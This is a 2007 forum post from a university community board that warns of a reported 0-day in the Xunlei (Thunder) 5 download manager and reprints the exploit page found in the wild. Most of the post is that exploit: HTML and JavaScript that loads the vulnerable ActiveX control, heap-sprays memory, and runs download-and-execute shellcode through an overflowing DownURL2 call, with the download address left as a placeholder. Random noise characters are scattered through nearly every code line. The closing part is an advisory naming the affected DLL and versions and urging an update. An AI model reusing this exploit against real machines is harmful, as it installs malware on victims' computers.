诚毅小家|集美大学生活【集美大学,诚毅学院,水产学院,师范学院,美术学院,财经学院,体育学院,航海学院,集美学村,石鼓路,龙舟池】

 找回密码
 注册

QQ登录

只需一步,快速开始

搜索
热搜: 活动 交友 discuz
查看: 427|回复: 0

最新迅雷5出现0-Day漏洞?新版的迅雷5.7.2.371 应该无此漏洞,请大家更新

[复制链接]
发表于 2007-9-26 22:12:35 | 显示全部楼层 |阅读模式
根据恶意网址检测的线报,发现一恶意网址使用未公开的迅雷50-Day漏洞进行挂马,其EXP代码如下:
1 @, V2 C' h( h0 O. F' K! D! |
& F% ^! S% _' Z/ L<html>/ m/ V0 h: ]3 ^* R% s; ?
<head>
5 V( r& @+ _; B3 \3 [( m2 s0 F" a" Y<meta http-equiv="Content-Type" c >
% C. j7 S: B, i. w. c( K7 J<title></title>3 o: D4 y  O8 @5 H
</head><body>, N8 c9 {8 [" A; b, s% ?: m7 v' l) n6 ]
<html>
4 s% g2 S* X0 c" I$ o0 ]<object classid="clsid:EEDD6FF9-13DE-496B-9A1C-D78B3215E266" id='target'></object>, |$ `6 [8 _# l7 h
<script language="javascript">
% Q8 b! h3 @( M4 ~& p/ a* E1 bvar she132132132132llc13ode = unescape("%u9090"+"%u9090"+
$ f9 a4 f% }8 O+ M8 E  ?" b, E+ z3 |7 H"%uefe9%u0000%u5a00%ua164%u0030%u0000%u408b%u8b0c" +
2 C5 M, v1 Q% _- L) a( |"%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378" +0 f/ I& o7 X: `8 k, Y# o2 ?
"%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b" +
4 q0 l8 `' y  I0 n* [5 D8 v3 a"%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%u04c7" +
( w6 |1 e+ W0 V"%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1" +
0 C4 `1 X) m& f4 {, [5 B4 J, c"%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" +( Y( C; k# K( m% h
"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" +
6 r, g- }/ V4 ^6 V"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" +  
2 W& H! d- j7 `"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" +- D4 \: ^+ B, ^& G  t9 r3 J
"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" +. i* b; g5 a4 [3 [
"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" +& R0 F2 h: s) S& G1 N$ |- D) _
"%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344" +
8 e) O' t! l; w, d  s"%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc" +- a5 T; x7 ]  X# U( ^
"%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0" +7 K9 j: E9 F' Z" n6 M2 Y
"%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab" +
5 K# F9 G/ e$ c+ @$ A"%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f" +# G4 ]) I% L: l2 d4 S' _( X
"%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574" +2 z$ v( }8 e3 p3 f' p
"%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e" +
- h0 c$ Y7 N% L: z; Q"%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00" +
: p: H6 [# V7 Q- D"%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c" +
) [) a1 q% q, X$ Y! E"%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54" +3 d. L* y$ y$ s; a: w5 N
"%u6946%u656c%u0041%u7468%u7074此处为需要下载病毒的网址%u0000");
) B1 C5 F8 M/ z- S) ]$ O: F  U</script>
$ T0 R# W0 i3 s! G! @<script language="javascript"> 6 @4 S" [' y0 @6 f: h
var IsNop1236326312 = '';4 p0 x, r! t2 i" K- z
var bi3123g123665blo2131ck = unescape("%u9090%u9090");' }3 ?: {; K% V/ l
var IsNop1236326312 = '';
) V2 K# Z8 |8 K  M. t- D% `0 M, W+ x# Avar he132132aders123132ize = 20;
* y3 u- X' j$ M7 @! n( evar IsNop1236326312 = '';
7 a0 f# }7 m8 F- k& rvar sl21123112ack312231312space = he132132aders123132ize+she132132132132llc13ode.length;
" E, U+ l6 F+ N7 d6 u: q) uvar IsNop1236326312 = '';2 x8 \) Y+ c+ B- @0 J0 h
while (bi3123g123665blo2131ck.length<sl21123112ack312231312space) bi3123g123665blo2131ck+=bi3123g123665blo2131ck;- k% p& ]" e, G, b
fillblock = bi3123g123665blo2131ck.substring(0, sl21123112ack312231312space);$ d5 `2 v1 |9 `8 a
block = bi3123g123665blo2131ck.substring(0, bi3123g123665blo2131ck.length-sl21123112ack312231312space);
, R7 |: I7 c- c* R' [while(block.length+sl21123112ack312231312space<0x40000) block = block+block+fillblock;1 R' u8 [/ ~0 m( _
memory = new Array();& D! C7 G% u) ~: M4 [$ L: c
for (x=0; x<300; x++) memory[x] = block + she132132132132llc13ode;
  X4 y% Z& F* Xvar b1u1231ff312er = '';- M0 \3 i0 z+ ?9 e% k& |1 P
var IsNop1236326312 = '';
0 M/ C+ r! g& i& I$ Uvar IsNop1236326312 = '';* o% I  A% f# t; w) [
while (b1u1231ff312er.length < 4057) b1u1231ff312er+="\x0a\x0a\x0a\x0a";
1 y4 M2 y3 J+ S& N+ Nb1u1231ff312er+="\x0a";  
* z: E0 d- d5 Z5 n5 Pb1u1231ff312er+="\x0a";7 j" I; l9 X" _) c0 |& f4 G
b1u1231ff312er+="\x0a";
# d3 Q7 ?  Q7 eb1u1231ff312er+="\x0a\x0a\x0a\x0a";
/ v& c0 \& v+ {6 T* Zb1u1231ff312er+="\x0a\x0a\x0a\x0a"; $ g7 g3 v1 B5 ^' V# v5 t
var yes="1111";5 D, \2 B# n8 {( ]: k
target.DownURL2(b1u1231ff312er,yes,yes,yes);* q) J3 s  N& S6 h0 G) P0 @
var IsNop1236326312 = '';
5 j1 _# V8 A" z5 _</script>
9 `  ]9 d6 |, e) r9 t</body></html>该代码风格颇相前段时间的《暴风影音IIActiveX栈溢出漏洞》,尾部为%u7468%u7074+此处为需要下载病毒的网址+%u0000"),但其CLSID为:EEDD6FF9-13DE-496B-9A1C-D78B3215E266
, \9 C- V" A% e( N/ e6 c% n$ ^3 b4 x+ M+ X

% a1 r0 s% d+ y; m
' u/ z. Q; g) n) F6 o, m经验证,该ActiveX控件文件为:C:\Program Files\Thunder Network\Thunder\Components\DownAndPlay\DownAndPlay\DapPlayer1.0.0.41.dll
" j$ i1 k  a0 a' q+ }7 G
/ z# x% i1 L3 F我已经将该信息提交给迅雷官方,相信迅雷官方会尽快更新软件, 字串5
2 Q( U5 ]+ F! p$ |. o; c+ [5 ]
7 p# {8 L7 T3 X$ q2 g: R- q在此,网络巡警提醒大家,使用迅雷软件请尽量使用最新版本的,最新版本下载地址为: 7 i% s1 x. S/ _
$ j' Q, t- q( _8 K
http://pstatic.xunlei.com/about/product/down_xl5.htm
. S6 N* ~( F# o0 p% l  ^2 R- ?4 k; m$ E7 p
我会进一步关注此漏洞。 " g0 N" ]% V4 S( \0 p( C% F8 Y$ S; U

( G# v$ X- }, \1 x% j8 M" u; v最近情况:
2 @8 J  O4 ^6 l- r5 I: G; s9 R+ [2 H/ m4 k$ o/ Y% Y; l
从一些信息来看,含有此漏洞的迅雷版本号为Xunlei Web Thunder 5.6.9.344 & `6 m' s  [) A8 u3 p* [7 i
新版的迅雷5.7.2.371 应该无此漏洞,请大家更新~
5 X5 Q+ C+ L( D4 q
! {4 E- q  b( t  X另外,该漏洞是一个叫做 7jdg 的人挖掘发现的(高手啊)。
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|Archiver|手机版|小黑屋|诚毅小家 ( 小家社区工作室 闽ICP备05007965号 )

GMT+8, 2024-12-23 13:15 , Processed in 0.048175 second(s), 23 queries .

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表